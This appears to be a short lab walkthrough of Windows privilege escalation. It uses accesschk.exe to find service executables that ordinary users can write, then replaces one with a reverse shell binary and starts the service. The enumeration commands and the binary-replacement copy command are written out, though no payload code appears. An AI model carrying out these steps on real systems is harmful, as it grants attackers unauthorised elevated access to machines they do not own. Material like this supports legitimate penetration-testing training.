we will check if we have write access to any files
.\\accesschk.exe -accepteula -wus "Users" c:\\*.* > c:\\rto\\fld-usr.txt
now let’s check the output
now this file don’t seem like it is useful
so let’s try to search as authenticated users
.\\accesschk.exe -accepteula -wus "Authenticated Users" c:\\*.* > c:\\rto\\fld-authusr.txt
and now let’s see the output
as we see now this results is promising as we have read and write access to the ssh service and also the bginfo.exe which is reasonable for the background on windows
.\\accesschk.exe -accepteula -wus "Users" c:\\*.* > c:\\privesc\\fld-usr.txt
now let’s see the output
as we see we have read and write permissions for this service
now let’s copy a malicious reverse shell to this path and name it filepermservice.exe (because that is the name of the executable)
copy C:\\PrivEsc\\esc.exe "C:\\Program Files\\File Permissions Service\\filepermservice.exe" /Y
now let’s run the service